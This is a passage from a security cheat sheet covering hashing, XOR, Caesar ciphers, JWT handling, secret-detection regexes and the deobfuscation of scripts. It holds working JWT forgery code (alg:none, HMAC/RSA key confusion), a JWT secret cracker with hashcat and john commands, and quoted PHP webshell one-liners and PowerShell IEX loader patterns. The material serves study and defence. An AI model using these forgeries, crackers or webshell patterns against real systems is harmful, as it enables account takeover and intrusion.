    ntlmv2_hash = hmac.new(nt_hash, identity, hashlib.md5).digest()

    # Step 3: NTLMv2 response = HMAC-MD5(NTLMv2_hash, server_challenge + blob)
    # blob is complex in practice; simplified here
    blob = server_challenge + client_challenge
    ntlmv2_response = hmac.new(ntlmv2_hash, blob, hashlib.md5).hexdigest()

    return ntlmv2_response

# Hashcat format for cracking Net-NTLMv2:
# user::domain:server_challenge:ntlmv2_response:blob
# hashcat -m 5600 hash.txt wordlist.txt

Multi-hash utility

import hashlib

def multi_hash(data: bytes) -> dict[str, str]:
    """Compute multiple hashes simultaneously."""
    algorithms = ['md5', 'sha1', 'sha256', 'sha512']
    return {algo: hashlib.new(algo, data).hexdigest() for algo in algorithms}

result = multi_hash(b"password")
for algo, digest in result.items():
    print(f"{algo:>8}: {digest}")

# Hash identification by length
HASH_LENGTHS = {
    32: ['MD5', 'NTLM', 'MD4'],
    40: ['SHA-1'],
    56: ['SHA-224'],
    64: ['SHA-256'],
    96: ['SHA-384'],
    128: ['SHA-512'],
}

def identify_hash(h: str) -> list[str]:
    """Identify possible hash type by length."""
    h = h.strip()
    length = len(h)
    candidates = HASH_LENGTHS.get(length, ['Unknown'])
    # Additional heuristics
    if length == 32 and ':' not in h:
        # Could be MD5 or NTLM — check context
        pass
    return candidates

# Compute all hashes at once
echo -n "password" | tee >(md5sum) >(sha1sum) >(sha256sum) >(sha512sum) > /dev/null

# Hash identification with hashid (pip install hashid)
hashid '5f4dcc3b5aa765d61d8327deb882cf99'

# Hash identification with hash-identifier or haiti
haiti '5f4dcc3b5aa765d61d8327deb882cf99'

7. XOR

Single-byte XOR

def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single key byte."""
    return bytes(b ^ key for b in data)

# Encrypt
plaintext = b"attack at dawn"
key = 0x42
ciphertext = xor_single_byte(plaintext, key)
print(ciphertext.hex())   # '233636232129622336622623352c'

# Decrypt (same operation)
recovered = xor_single_byte(ciphertext, key)
assert recovered == plaintext

Multi-byte XOR

from itertools import cycle

def xor_multi_byte(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating multi-byte key."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))

plaintext = b"The quick brown fox jumps over the lazy dog"
key = b"SECRET"
ciphertext = xor_multi_byte(plaintext, key)
recovered = xor_multi_byte(ciphertext, key)
assert recovered == plaintext

Single-byte XOR brute force

def xor_bruteforce(ciphertext: bytes) -> list[tuple[int, bytes, float]]:
    """Brute force all 256 single-byte XOR keys. Score by ratio of ASCII letters and spaces."""
    # A plain printable-ASCII ratio ties across many keys on short inputs,
    # so score on letters and spaces, which favors English-like text.
    texty = set(b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ ")
    results = []
    for key in range(256):
        candidate = xor_single_byte(ciphertext, key)
        score = sum(1 for b in candidate if b in texty) / len(candidate)
        results.append((key, candidate, score))
    results.sort(key=lambda x: x[2], reverse=True)
    return results

# Example: recover the key for "attack at dawn" XORed with 0x42
encoded = bytes.fromhex("233636232129622336622623352c")
for key, plaintext, score in xor_bruteforce(encoded)[:3]:
    print(f"Key 0x{key:02x} ({score:.0%}): {plaintext}")

Known-plaintext XOR attack

def xor_known_plaintext(ciphertext: bytes, known_plain: bytes, offset: int = 0) -> bytes:
    """Recover XOR key using known plaintext at a known offset."""
    key_fragment = bytes(c ^ p for c, p in zip(ciphertext[offset:], known_plain))
    return key_fragment

# Example: PE files always start with 'MZ' (0x4d5a)
# If XOR-encoded PE is found, recover first 2 key bytes:
encoded_pe = b'\x1f\x28\x90\x00...'  # hypothetical
known = b'MZ'
key_start = xor_known_plaintext(encoded_pe, known)
print(f"Key starts with: {key_start.hex()}")

# Known plaintext for common file types:
# PE/DLL:   b'MZ' (4d5a)
# ELF:      b'\x7fELF' (7f454c46)
# PDF:      b'%PDF' (25504446)
# ZIP/DOCX: b'PK\x03\x04' (504b0304)
# GZIP:     b'\x1f\x8b' (1f8b)
# PNG:      b'\x89PNG\r\n\x1a\n' (89504e470d0a1a0a)
# JPEG:     b'\xff\xd8\xff' (ffd8ff)

# Recover repeating key length using normalized Hamming distance (a statistical alternative to Kasiski examination)
def hamming_distance(b1: bytes, b2: bytes) -> int:
    return sum(bin(a ^ b).count('1') for a, b in zip(b1, b2))

def guess_key_length(ciphertext: bytes, max_len: int = 40) -> list[tuple[int, float]]:
    """Estimate repeating XOR key length via normalized Hamming distance."""
    scores = []
    for kl in range(2, max_len + 1):
        blocks = [ciphertext[i*kl:(i+1)*kl] for i in range(4)]
        if len(blocks[3]) < kl:
            continue
        distances = []
        for i in range(len(blocks)):
            for j in range(i+1, len(blocks)):
                distances.append(hamming_distance(blocks[i], blocks[j]) / kl)
        avg = sum(distances) / len(distances)
        scores.append((kl, avg))
    scores.sort(key=lambda x: x[1])
    return scores[:5]
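The magic-byte list in this section can also drive an automated check: XOR the start of a blob against each signature and see whether a single key byte explains the whole prefix. A minimal sketch for the single-byte case only; the function name is hypothetical, and the sample blob is generated in the script.

```python
MAGIC = {
    "PE": b"MZ",
    "ELF": b"\x7fELF",
    "PDF": b"%PDF",
    "ZIP": b"PK\x03\x04",
    "GZIP": b"\x1f\x8b",
    "PNG": b"\x89PNG\r\n\x1a\n",
    "JPEG": b"\xff\xd8\xff",
}

def single_byte_key_candidates(blob: bytes) -> list[tuple[str, int]]:
    """For each file type, report the key if one byte maps the blob prefix to its magic."""
    hits = []
    for name, magic in MAGIC.items():
        if len(blob) < len(magic):
            continue
        keys = {c ^ m for c, m in zip(blob, magic)}
        if len(keys) == 1:            # same key byte at every magic position
            hits.append((name, keys.pop()))
    return hits

sample = bytes(b ^ 0x42 for b in b"\x7fELF\x02\x01\x01\x00")
print(single_byte_key_candidates(sample))   # [('ELF', 66)]
```

Short signatures such as the 2-byte PE and GZIP magics match by coincidence more often than longer ones, so confirm a hit by decoding further into the header.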

# XOR with Python one-liner
python3 -c "
data = bytes.fromhex('233636232129622336622623352c')
key = 0x42
print(bytes(b ^ key for b in data))
"

# Analyze a XOR-encrypted file with xortool
# pip install xortool
xortool encrypted.bin                   # estimate probable key lengths
xortool -l 4 -c 00 encrypted.bin        # key length 4, assume 0x00 is the most frequent plaintext byte

8. ROT13 / ROT47 / Caesar

ROT13 (letters only, A-Z / a-z shifted by 13)

import codecs

# Encode/Decode (symmetric — same operation)
encoded = codecs.encode("Attack at dawn", "rot_13")    # "Nggnpx ng qnja"
decoded = codecs.encode(encoded, "rot_13")             # "Attack at dawn"

# Manual implementation
def rot13(text: str) -> str:
    result = []
    for c in text:
        if 'a' <= c <= 'z':
            result.append(chr((ord(c) - ord('a') + 13) % 26 + ord('a')))
        elif 'A' <= c <= 'Z':
            result.append(chr((ord(c) - ord('A') + 13) % 26 + ord('A')))
        else:
            result.append(c)
    return ''.join(result)

echo "Attack at dawn" | tr 'A-Za-z' 'N-ZA-Mn-za-m'    # Nggnpx ng qnja
echo "Nggnpx ng qnja" | tr 'A-Za-z' 'N-ZA-Mn-za-m'    # Attack at dawn

# Alternative
echo "Attack at dawn" | rot13   # if rot13 command available

ROT47 (printable ASCII 33-126, shifted by 47)

def rot47(text: str) -> str:
    """ROT47: rotate printable ASCII characters (! through ~)."""
    result = []
    for c in text:
        o = ord(c)
        if 33 <= o <= 126:
            result.append(chr(33 + (o - 33 + 47) % 94))
        else:
            result.append(c)
    return ''.join(result)

encoded = rot47("Attack at dawn!")     # "pEE24< 2E 52H?P"
decoded = rot47(encoded)               # "Attack at dawn!"

echo "Attack at dawn!" | tr '!-~' 'P-~!-O'

General Caesar cipher (arbitrary shift)

def caesar(text: str, shift: int) -> str:
    result = []
    for c in text:
        if 'a' <= c <= 'z':
            result.append(chr((ord(c) - ord('a') + shift) % 26 + ord('a')))
        elif 'A' <= c <= 'Z':
            result.append(chr((ord(c) - ord('A') + shift) % 26 + ord('A')))
        else:
            result.append(c)
    return ''.join(result)

# Brute force all 26 shifts
def caesar_bruteforce(ciphertext: str) -> list[tuple[int, str]]:
    return [(shift, caesar(ciphertext, shift)) for shift in range(26)]

# Example: CTF challenge
for shift, candidate in caesar_bruteforce("Gur synt vf PGS{ebg13_vf_rnfl}"):
    if 'CTF' in candidate or 'flag' in candidate.lower():
        print(f"Shift {shift}: {candidate}")
# Shift 13: The flag is CTF{rot13_is_easy}
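
When the plaintext has no known marker such as "CTF", the 26 candidates can be ranked instead of filtered. The following is a minimal sketch that assumes English plaintext; `COMMON_WORDS` and `rank_caesar` are hypothetical names introduced for illustration, and the tiny word list stands in for a real dictionary.

```python
import re

# Hypothetical mini word list; a real one would be much larger.
COMMON_WORDS = {"the", "and", "is", "of", "to", "in", "flag", "at", "that", "it"}

def caesar(text: str, shift: int) -> str:
    """Shift ASCII letters by `shift`, leaving everything else untouched."""
    out = []
    for c in text:
        if 'a' <= c <= 'z':
            out.append(chr((ord(c) - 97 + shift) % 26 + 97))
        elif 'A' <= c <= 'Z':
            out.append(chr((ord(c) - 65 + shift) % 26 + 65))
        else:
            out.append(c)
    return ''.join(out)

def rank_caesar(ciphertext: str) -> list[tuple[int, int, str]]:
    """Return (score, shift, candidate) for all 26 shifts, best score first."""
    ranked = []
    for shift in range(26):
        candidate = caesar(ciphertext, shift)
        words = re.findall(r'[a-z]+', candidate.lower())
        score = sum(1 for w in words if w in COMMON_WORDS)
        ranked.append((score, shift, candidate))
    return sorted(ranked, key=lambda r: r[0], reverse=True)

score, shift, plaintext = rank_caesar("Gur synt vf PGS{ebg13_vf_rnfl}")[0]
print(shift, plaintext)
```

Word matching is crude but needs no frequency tables; for longer ciphertexts a letter-frequency score is likely to be more robust.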

9. JWT (JSON Web Tokens)

Decode JWT (no verification)

import base64
import json

def jwt_decode(token: str) -> dict:
    """Decode JWT without verification — forensic/analysis use."""
    parts = token.split('.')
    if len(parts) != 3:
        raise ValueError("Invalid JWT format")

    def decode_part(part: str) -> dict:
        # Add padding
        padded = part + '=' * (-len(part) % 4)
        decoded = base64.urlsafe_b64decode(padded)
        return json.loads(decoded)

    header = decode_part(parts[0])
    payload = decode_part(parts[1])
    signature = parts[2]

    return {
        'header': header,
        'payload': payload,
        'signature': signature,
        'raw_parts': parts
    }

# Example
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
result = jwt_decode(token)
print(json.dumps(result['header'], indent=2))
# {"alg": "HS256", "typ": "JWT"}
print(json.dumps(result['payload'], indent=2))
# {"sub": "1234567890", "name": "John Doe", "iat": 1516239022}

# Bash — decode JWT
echo "eyJhbGciOiJIUzI1NiJ9" | base64 -d 2>/dev/null
# {"alg":"HS256"}

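# Full decode (JWT segments are unpadded base64url: map -_ back to +/ first;
# base64 may still complain about the missing '=', hence 2>/dev/null)
TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIn0.dozjgNryP4J3jVmNHl0w5N_XgL0n3I9PlFUP0THsR8U"
echo "$TOKEN" | cut -d. -f2 | tr '_-' '/+' | base64 -d 2>/dev/null | python3 -m json.tool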

Forge JWT with alg:none attack (CVE-2015-9235)

import base64
import json

def jwt_forge_none(payload: dict) -> str:
    """Forge JWT with alg:none — exploits servers that don't verify algorithm."""
    header = {"alg": "none", "typ": "JWT"}

    def encode_part(data: dict) -> str:
        return base64.urlsafe_b64encode(
            json.dumps(data, separators=(',', ':')).encode()
        ).rstrip(b'=').decode()

    return f"{encode_part(header)}.{encode_part(payload)}."

# Forge admin token
forged = jwt_forge_none({
    "sub": "1",
    "name": "admin",
    "role": "admin",
    "iat": 1516239022
})
print(forged)
# eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.

# Variations that bypass filters:
# "alg": "None"
# "alg": "NONE"
# "alg": "nOnE"

Forge JWT with HMAC/RSA confusion (CVE-2016-10555)

import hmac
import hashlib
import base64
import json

def jwt_forge_hmac_rsa_confusion(payload: dict, public_key: bytes) -> str:
    """
    If server uses RS256 but accepts HS256, sign with the PUBLIC key as HMAC secret.
    The server will verify using the public key as HMAC key — signature matches.
    """
    header = {"alg": "HS256", "typ": "JWT"}

    def encode_part(data: dict) -> str:
        return base64.urlsafe_b64encode(
            json.dumps(data, separators=(',', ':')).encode()
        ).rstrip(b'=').decode()

    header_b64 = encode_part(header)
    payload_b64 = encode_part(payload)
    signing_input = f"{header_b64}.{payload_b64}".encode()

    signature = hmac.new(public_key, signing_input, hashlib.sha256).digest()
    sig_b64 = base64.urlsafe_b64encode(signature).rstrip(b'=').decode()

    return f"{header_b64}.{payload_b64}.{sig_b64}"

# Usage: obtain server's public key (often in /.well-known/jwks.json or /api/public-key)
# with open("public.pem", "rb") as f:
#     forged = jwt_forge_hmac_rsa_confusion({"sub": "admin"}, f.read())

Crack JWT secret (HS256)

# Using hashcat
hashcat -m 16500 jwt.txt wordlist.txt

# Using john the ripper
john jwt.txt --wordlist=wordlist.txt --format=HMAC-SHA256

# Using jwt_tool (pip install jwt_tool)
python3 jwt_tool.py <token> -C -d wordlist.txt

import hmac
import hashlib
import base64

def jwt_crack(token: str, wordlist_path: str) -> str | None:
    """Brute-force HS256 JWT secret from a wordlist."""
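    parts = token.split('.')
    if len(parts) != 3:
        raise ValueError("Invalid JWT format")
    signing_input = f"{parts[0]}.{parts[1]}".encode()
    # Restore exactly the base64url padding that JWTs strip
    target_sig = base64.urlsafe_b64decode(parts[2] + '=' * (-len(parts[2]) % 4))

    with open(wordlist_path, 'r', errors='ignore') as f:
        for line in f:
            # Strip only the line ending: spaces may be part of the secret
            secret = line.rstrip('\r\n')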
            computed = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
            if hmac.compare_digest(computed, target_sig):
                return secret
    return None

JWT security checklist

Attack	Condition	Mitigation
alg:none	Server accepts unsigned tokens	Reject `none` algorithm; whitelist allowed algorithms
HMAC/RSA confusion	Server accepts HS256 when configured for RS256	Enforce algorithm in server config, not from token header
Weak secret	Short/guessable HMAC key	Use 256+ bit random secret
No expiry	Missing `exp` claim	Always set and validate `exp`
kid injection	`kid` header used in SQL/file lookup	Sanitize `kid`, use allowlist
jwk/jku injection	Server fetches attacker-controlled key	Whitelist key sources
Claim tampering	Only signature checked, not claims	Validate all security-relevant claims server-side

10. Regular Expressions for Security

IPv4 / IPv6

import re

# IPv4 — strict
IPV4 = re.compile(
    r'\b(?:(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}'
    r'(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\b'
)

# IPv4 with CIDR
IPV4_CIDR = re.compile(
    r'\b(?:(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}'
    r'(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)(?:/(?:3[0-2]|[12]?\d))?\b'
)

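# IPv6, simplified: full 8-group form, or one '::' compression (no zone IDs or embedded IPv4)
IPV6 = re.compile(
    r'(?<![0-9A-Za-z:])(?:'
    r'(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}'
    r'|(?:[0-9a-fA-F]{1,4}(?::[0-9a-fA-F]{1,4}){0,6})?::'
    r'(?:[0-9a-fA-F]{1,4}(?::[0-9a-fA-F]{1,4}){0,6})?'
    r')(?![0-9A-Za-z:])'
)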

# Private/RFC1918 ranges
PRIVATE_IPV4 = re.compile(
    r'\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}|'
    r'172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}|'
    r'192\.168\.\d{1,3}\.\d{1,3})\b'
)
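
Regexes are good at finding candidates but weak at validating them. A common pattern is to match loosely and then hand each candidate to the standard-library `ipaddress` module. The sketch below assumes that approach; `IPV4_CANDIDATE` and `classify_ips` are hypothetical names. Note that `is_private` covers more than RFC 1918 (loopback, link-local, and other reserved ranges).

```python
import ipaddress
import re

# Deliberately loose: validation is delegated to ipaddress.
IPV4_CANDIDATE = re.compile(r'\b\d{1,3}(?:\.\d{1,3}){3}\b')

def classify_ips(text: str) -> dict[str, list[str]]:
    """Sort dotted-quad candidates into private, public, and invalid."""
    result = {"private": [], "public": [], "invalid": []}
    for candidate in IPV4_CANDIDATE.findall(text):
        try:
            addr = ipaddress.ip_address(candidate)
        except ValueError:
            result["invalid"].append(candidate)
            continue
        bucket = "private" if addr.is_private else "public"
        result[bucket].append(candidate)
    return result

print(classify_ips("src=10.1.2.3 dst=8.8.8.8 junk=999.1.1.1"))
```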

URLs

URL = re.compile(
    r'https?://(?:[\w-]+\.)+[\w]{2,}'      # scheme + domain
    r'(?::\d{1,5})?'                         # optional port
    r'(?:/[^\s\'"<>]*)?'                     # optional path
)

# Extract domain from URL
DOMAIN = re.compile(r'https?://([^/:]+)')

Email

EMAIL = re.compile(
    r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b'
)

Hashes (for IOC extraction)

MD5_RE    = re.compile(r'\b[0-9a-fA-F]{32}\b')
SHA1_RE   = re.compile(r'\b[0-9a-fA-F]{40}\b')
SHA256_RE = re.compile(r'\b[0-9a-fA-F]{64}\b')
SHA512_RE = re.compile(r'\b[0-9a-fA-F]{128}\b')

CVE IDs

CVE = re.compile(r'CVE-\d{4}-\d{4,}')

Credit card numbers (PCI DSS scanning)

# Visa
VISA = re.compile(r'\b4\d{3}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b')

# Mastercard (51-55 prefixes only; the newer 2221-2720 range is not covered)
MC = re.compile(r'\b5[1-5]\d{2}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b')

# AMEX
AMEX = re.compile(r'\b3[47]\d{2}[\s-]?\d{6}[\s-]?\d{5}\b')

# Generic (13-19 digits, optionally separated)
CC_GENERIC = re.compile(r'\b(?:\d[\s-]?){13,19}\b')

def luhn_check(number: str) -> bool:
    """Validate credit card number with Luhn algorithm."""
    digits = [int(d) for d in number if d.isdigit()]
    digits.reverse()
    total = 0
    for i, d in enumerate(digits):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0
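
The generic pattern matches any long digit run, so in practice it is paired with the Luhn check to cut false positives. A minimal sketch of that pairing follows; `CARD_CANDIDATE` and `find_card_numbers` are hypothetical names, and the candidate regex is a slightly tightened variant of `CC_GENERIC` that cannot swallow a trailing separator.

```python
import re

# 13-19 digits, optionally separated by single spaces or hyphens.
CARD_CANDIDATE = re.compile(r'\b\d(?:[ -]?\d){12,18}\b')

def luhn_check(number: str) -> bool:
    """Luhn checksum: double every second digit from the right."""
    digits = [int(d) for d in number if d.isdigit()]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0

def find_card_numbers(text: str) -> list[str]:
    """Return digit-only card candidates that also pass the Luhn check."""
    hits = []
    for match in CARD_CANDIDATE.finditer(text):
        digits = re.sub(r'\D', '', match.group())
        if luhn_check(digits):
            hits.append(digits)
    return hits

# 4111 1111 1111 1111 is a widely used Visa test number.
print(find_card_numbers("order 4111 1111 1111 1111 ref 4111-1111-1111-1112"))
```

About one in ten random digit strings passes Luhn by chance, so surviving hits still deserve a look at their context.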

# US Social Security numbers (format only)
SSN = re.compile(r'\b\d{3}-\d{2}-\d{4}\b')
# Stricter (excludes known invalid ranges)
SSN_STRICT = re.compile(
    r'\b(?!000|666|9\d{2})\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b'
)

API keys and secrets

# AWS Access Key ID
AWS_KEY = re.compile(r'\b(?:AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}\b')

# AWS Secret Access Key
AWS_SECRET = re.compile(r'(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])')

# GitHub Personal Access Token
GITHUB_PAT = re.compile(r'\bghp_[A-Za-z0-9]{36}\b')
GITHUB_PAT_FINE = re.compile(r'\bgithub_pat_[A-Za-z0-9_]{82}\b')

# Slack Bot Token
SLACK_BOT = re.compile(r'\bxoxb-\d{10,13}-\d{10,13}-[a-zA-Z0-9]{24}\b')

# Slack Webhook
SLACK_WEBHOOK = re.compile(r'https://hooks\.slack\.com/services/T[A-Z0-9]{8}/B[A-Z0-9]{8}/[a-zA-Z0-9]{24}')

# Google API Key
GOOGLE_API = re.compile(r'\bAIza[0-9A-Za-z_-]{35}\b')

# Generic high-entropy string (potential secret)
import math
def entropy(s: str) -> float:
    freq = {}
    for c in s:
        freq[c] = freq.get(c, 0) + 1
    return -sum((f/len(s)) * math.log2(f/len(s)) for f in freq.values())

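# Values of 20+ chars assigned to secret-like names; score the captured group
# with entropy() afterwards (more than 4.5 bits per character is suspicious)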
GENERIC_SECRET = re.compile(r'(?:key|token|secret|password|api_key|apikey|access_key)\s*[=:]\s*["\']?([A-Za-z0-9+/=_-]{20,})["\']?', re.IGNORECASE)
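
The entropy function and the generic pattern are meant to work together: the regex proposes values, and the entropy score decides which ones look random. A minimal sketch, assuming the 4.5 bits-per-character threshold mentioned above; `find_likely_secrets` is a hypothetical helper name.

```python
import math
import re

GENERIC_SECRET = re.compile(
    r'(?:key|token|secret|password|api_key|apikey|access_key)\s*[=:]\s*'
    r'["\']?([A-Za-z0-9+/=_-]{20,})["\']?',
    re.IGNORECASE,
)

def entropy(s: str) -> float:
    """Shannon entropy in bits per character."""
    freq = {}
    for c in s:
        freq[c] = freq.get(c, 0) + 1
    return -sum((f / len(s)) * math.log2(f / len(s)) for f in freq.values())

def find_likely_secrets(text: str, min_entropy: float = 4.5) -> list[str]:
    """Keep only captured values whose entropy exceeds the threshold."""
    return [v for v in GENERIC_SECRET.findall(text) if entropy(v) > min_entropy]

sample = (
    'api_key = "abcdefghijklmnopqrstuvwxyzABCDEF"\n'
    'password = "aaaaaaaaaaaaaaaaaaaaaaaa"\n'
)
print(find_likely_secrets(sample))
```

One caveat on the threshold: a string of n characters can reach at most log2(n) bits per character, so a 20-character value tops out near 4.32 and can never exceed 4.5. A lower threshold, or one scaled to length, may suit short tokens better.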

# Private key markers
PRIVATE_KEY = re.compile(r'-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----')

# JWT pattern
JWT_RE = re.compile(r'\beyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*\b')

Combined IOC extractor

def extract_iocs(text: str) -> dict[str, list[str]]:
    """Extract all security-relevant indicators from text."""
    return {
        'ipv4': list(set(IPV4.findall(text))),
        'email': list(set(EMAIL.findall(text))),
        'url': list(set(URL.findall(text))),
        'md5': list(set(MD5_RE.findall(text))),
        'sha1': list(set(SHA1_RE.findall(text))),
        'sha256': list(set(SHA256_RE.findall(text))),
        'cve': list(set(CVE.findall(text))),
        'aws_key': list(set(AWS_KEY.findall(text))),
        'github_pat': list(set(GITHUB_PAT.findall(text))),
        'jwt': list(set(JWT_RE.findall(text))),
        'private_key': list(set(PRIVATE_KEY.findall(text))),
    }

11. Obfuscation & Deobfuscation

JavaScript obfuscation patterns

# --- JSFuck (encode JS using only []()!+ ) ---
# 's' becomes: (![]+[])[+!+[]+!+[]+!+[]]   i.e. "false"[3]
# Full charset available from 6 characters

# --- Hex escape obfuscation ---
# eval("\x61\x6c\x65\x72\x74\x28\x31\x29")  ->  eval("alert(1)")

# --- Unicode escape ---
# \u0061\u006c\u0065\u0072\u0074(1)  ->  alert(1)

# --- String.fromCharCode ---
# eval(String.fromCharCode(97,108,101,114,116,40,49,41))  ->  eval("alert(1)")

# --- Deobfuscate String.fromCharCode ---
def deobfuscate_charcode(js: str) -> str:
    """Deobfuscate String.fromCharCode() calls."""
    import re
    pattern = r'String\.fromCharCode\(([\d,\s]+)\)'
    def replace(m):
        chars = [int(c.strip()) for c in m.group(1).split(',')]
        return repr(''.join(chr(c) for c in chars))
    return re.sub(pattern, replace, js)

# --- Deobfuscate hex/unicode escapes ---
def deobfuscate_js_escapes(js: str) -> str:
    """Resolve \\xNN and \\uNNNN escapes in JavaScript strings."""
    import re
    # \xNN
    result = re.sub(r'\\x([0-9a-fA-F]{2})',
                    lambda m: chr(int(m.group(1), 16)), js)
    # \uNNNN
    result = re.sub(r'\\u([0-9a-fA-F]{4})',
                    lambda m: chr(int(m.group(1), 16)), result)
    return result

# --- Deobfuscate atob() (base64 in JS) ---
# atob("YWxlcnQoMSk=") -> "alert(1)"
def deobfuscate_atob(js: str) -> str:
    import re, base64
    pattern = r'atob\(["\']([A-Za-z0-9+/=]+)["\']\)'
    def replace(m):
        return repr(base64.b64decode(m.group(1)).decode())
    return re.sub(pattern, replace, js)

PowerShell obfuscation patterns

# --- Encoded command ---
# powershell -enc <base64 of UTF-16LE>
import base64
def decode_ps_encoded_command(encoded: str) -> str:
    return base64.b64decode(encoded).decode('utf-16-le')
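
For test fixtures and detection rules it helps to produce the encoded form as well as decode it. The sketch below is a simple round trip under the same UTF-16LE assumption; `encode_ps_command` and `decode_ps_command` are hypothetical helper names.

```python
import base64

def encode_ps_command(command: str) -> str:
    """Build the argument expected by powershell -enc: Base64 of UTF-16LE."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

def decode_ps_command(encoded: str) -> str:
    """Reverse of encode_ps_command."""
    return base64.b64decode(encoded).decode("utf-16-le")

encoded = encode_ps_command("whoami")
print(encoded)                      # dwBoAG8AYQBtAGkA
print(decode_ps_command(encoded))   # whoami
```

The interleaved zero bytes of UTF-16LE are why encoded ASCII commands show the recurring "A" characters seen here, which is a handy visual tell when triaging logs.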

# --- String concatenation ---
# 'Inv'+'oke'+'-Exp'+'ression' -> 'Invoke-Expression'

# --- Backtick escaping ---
# Inv`oke-Ex`pre`ssion -> Invoke-Expression
def deobfuscate_backticks(ps: str) -> str:
    import re
    # Drop backticks before ordinary characters; keep real escapes such as `n, `t, `0
    return re.sub(r'`([^0abfnrtv])', r'\1', ps)

# --- [char] casts ---
# [char]73 + [char]69 + [char]88 -> I + E + X  (each cast is replaced in place; the '+' joins remain and spell IEX)
def deobfuscate_char_cast(ps: str) -> str:
    import re
    def replace(m):
        return chr(int(m.group(1)))
    return re.sub(r'\[char\]\s*(\d+)', replace, ps, flags=re.IGNORECASE)

# --- Environment variable concatenation ---
# $env:comspec[4,15,25]-join'' -> 'Iex'  (chars 4, 15, 25 of 'C:\WINDOWS\system32\cmd.exe'; command names are case-insensitive, so this resolves to iex)

# --- Compressed / deflate streams ---
# IEX(New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream(
#   [IO.MemoryStream][Convert]::FromBase64String('...'),
#   [IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()

def decode_ps_deflate(b64_data: str) -> str:
    import base64, zlib
    compressed = base64.b64decode(b64_data)
    # PowerShell uses raw deflate (no zlib header), wbits=-15
    return zlib.decompress(compressed, -15).decode('utf-8', errors='replace')

# --- Combined deobfuscation pipeline ---
def deobfuscate_powershell(script: str) -> str:
    script = deobfuscate_backticks(script)
    script = deobfuscate_char_cast(script)
    # Remove common no-op patterns
    script = script.replace("( ", "(").replace(" )", ")")
    return script

Python obfuscation patterns

# --- exec(compile()) ---
# exec(compile(base64.b64decode(b'cHJpbnQoImhlbGxvIik='),'<string>','exec'))

# --- Lambda chains ---
# (lambda: (lambda f: f(f))(lambda f: print("hello")))()

# --- Marshal/bytecode ---
import marshal
code = compile("print('hello')", "<string>", "exec")
serialized = marshal.dumps(code)
# Reconstruct: exec(marshal.loads(serialized))

# --- Deobfuscation: extract strings from exec/eval ---
def safe_deobfuscate_exec(code: str) -> str:
    """Replace exec/eval with print to see what would execute."""
    import re
    code = re.sub(r'\bexec\s*\(', 'print(', code)
    code = re.sub(r'\beval\s*\(', 'print(', code)
    return code
# WARNING: Only run deobfuscated code in a sandbox/VM
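
A purely static alternative is to parse the sample with `ast` and decode any Base64 literals without executing anything. The sketch below assumes the payload is passed as a literal to a call named `b64decode`; `extract_b64_literals` is a hypothetical helper name, and samples that assemble the string at runtime will not be caught.

```python
import ast
import base64
import binascii

def extract_b64_literals(source: str) -> list[str]:
    """Decode literal arguments of b64decode(...) calls without running the code."""
    decoded = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call) or not node.args:
            continue
        func = node.func
        # Handles both base64.b64decode(...) and a bare b64decode(...)
        name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")
        if name != "b64decode":
            continue
        arg = node.args[0]
        if isinstance(arg, ast.Constant) and isinstance(arg.value, (bytes, str)):
            try:
                raw = base64.b64decode(arg.value)
            except (binascii.Error, ValueError):
                continue
            decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded

sample = "exec(compile(base64.b64decode(b'cHJpbnQoImhlbGxvIik='),'<string>','exec'))"
print(extract_b64_literals(sample))
```

Because the sample is only parsed, never compiled or executed, this step is safe to run outside a sandbox; the decoded layer can then be fed back in to peel nested encodings.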

PHP obfuscation patterns

// Common patterns in webshells:

// eval(base64_decode('...'))
// eval(gzinflate(base64_decode('...')))
// eval(str_rot13('...'))
// preg_replace('/.*/e', base64_decode('...'), '')   // /e modifier = eval (PHP < 7)
// assert(base64_decode('...'))                       // acts like eval
// create_function('', base64_decode('...'))          // anonymous eval

// Variable function calls (hiding function names):
// $f = 'sys'.'tem'; $f('whoami');
// $_GET['cmd']($_GET['arg']);                         // webshell one-liner

// chr() obfuscation:
